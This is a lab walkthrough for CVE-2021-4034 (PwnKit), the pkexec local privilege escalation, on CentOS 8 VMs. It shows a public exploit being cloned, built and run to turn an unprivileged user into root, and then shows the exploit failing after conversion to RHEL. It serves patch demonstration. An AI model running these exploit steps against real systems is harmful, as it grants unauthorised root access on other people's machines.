PwnKit is the name associated with CVE-2021-4034 - Pkexec Local Privilege Escalation.
There are a number of sample escallation examples availble today including
For this demo we’ll show how the standard Cloud Images for Centos are impacted by the exploit that once updated to RHEL the exploit has been remediated
This demo has been validated against the following Centos Images
-
CentOS-8-GenericCloud-8.4.2105-20210603.0.x86_64.qcow2
-
including patched upto Centos 8.5
-
First we need a Centos Virtual machine
For Centos 8 we also need to update the yum repositories to point to the centos vault.
ssh leapp2rhel
# wait for the login to complete
sed -i 's/^mirrorlist/#mirrorlist/g' /etc/yum.repos.d/CentOS-*
sed -i 's|#baseurl=http://mirror.centos.org|baseurl=https://vault.centos.org|g' /etc/yum.repos.d/CentOS-*Here we use Ansible to create the user and configure the environment
cd ansible
ansible-playbook -i hosts pwnkit.yamlInstall the required tools into your VM and download the exploit respoitory
ssh leapp2rhel
yum install gcc make git
useradd developer
#Switch to the developer user, and download the exploit repo
su -i developer
# Clone the exploit code, and build the exploit
git clone https://github.com/luijait/PwnKit-Exploit.gitThe flow is
-
Show the exploit exists under our developer user
-
Convert Centos environment to RHEL with Convert2RHEL
-
Show the exploit no longer works
# Login as our developer user
ssh developer@leapp2rhel
# Clone the Git Repo
git clone https://github.com/luijait/PwnKit-Exploit.git Exploit
# Build the PwnKit Exploit
cd Exploit
make
# Confirm our user details
id
uid=1000(developer) gid=1000(developer) groups=1000(developer) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
# Confirm we can't access the root user
sudo -i
# Should produce a response similar to
[sudo] password for developer:
developer is not in the sudoers file. This incident will be reported.
# Now run our exploit
./exploit
Current User before execute exploit
hacker@victim$whoami: developer
Exploit written by @luijait (0x6c75696a616974)
[+] Enjoy your root if exploit was completed succesfully
[root@localhost PwnKit-Exploit]# id
uid=0(root) gid=0(root) groups=0(root),1001(developer) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
exit
logoutConvert Centos environment to RHEL with Convert2RHEL
# Login as our developer user
ssh developer@leapp2rhel
./exploit
# Exploit fails
Current User before execute exploit
hacker@victim$whoami: developer
Exploit written by @luijait (0x6c75696a616974)
[+] Enjoy your root if exploit was completed succesfully
pkexec --version |
--help |
--disable-internal-agent |
[--user username] PROGRAM [ARGUMENTS...]
See the pkexec manual page for more details.
Report bugs to: http://lists.freedesktop.org/mailman/listinfo/polkit-devel
polkit home page: <http://www.freedesktop.org/wiki/Software/polkit>